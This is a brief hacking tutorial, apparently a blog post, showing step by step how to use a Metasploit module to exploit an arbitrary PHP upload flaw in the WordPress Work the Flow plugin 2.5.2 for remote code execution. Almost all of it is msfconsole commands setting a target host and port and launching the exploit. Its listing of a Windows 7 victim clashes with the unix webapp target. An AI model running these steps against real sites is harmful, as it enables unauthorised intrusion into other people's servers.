This module exploits an arbitrary PHP code upload in the WordPress Work the Flow plugin, version 2.5.2. The vulnerability allows for arbitrary file upload and remote code execution
Exploit Targets
Work the Flow plugin, version 2.5.2.
Requirement
Attacker: kali Linux
Victim PC: Windows 7
Open Kali terminal type msfconsole
Now type use exploit/unix/webapp/wp_worktheflow_upload
msf exploit (wp_worktheflow_upload)>set targeturi wordpress
msf exploit (wp_worktheflow_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_worktheflow_upload)>set rport 80
msf exploit (wp_worktheflow_upload)>exploit
The post Hack Remote PC using WordPress Work the Flow Upload Vulnerability appeared first on Hacking Articles.